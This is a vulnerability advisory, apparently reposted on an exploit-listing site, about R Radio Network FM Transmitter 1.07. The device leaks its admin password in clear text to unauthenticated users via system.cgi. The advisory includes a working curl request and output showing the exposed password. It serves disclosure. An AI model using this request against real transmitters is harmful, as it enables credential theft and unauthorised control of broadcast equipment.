R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure Vulnerability

2024-03-0400:00:00

LiquidWorm

0day.today

radio network fm transmitter

password disclosure vulnerability

improper access control

unauthenticated actor

system.cgi endpoint

admin password

authentication bypass

fm station setup access

csbtechdevice

gjoko krstic

advisory url.

7.4 High

AI Score

Confidence

Low

JSON

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure


Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php


09.10.2023

--


$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$

7.4 High

AI Score

Confidence

Low

JSON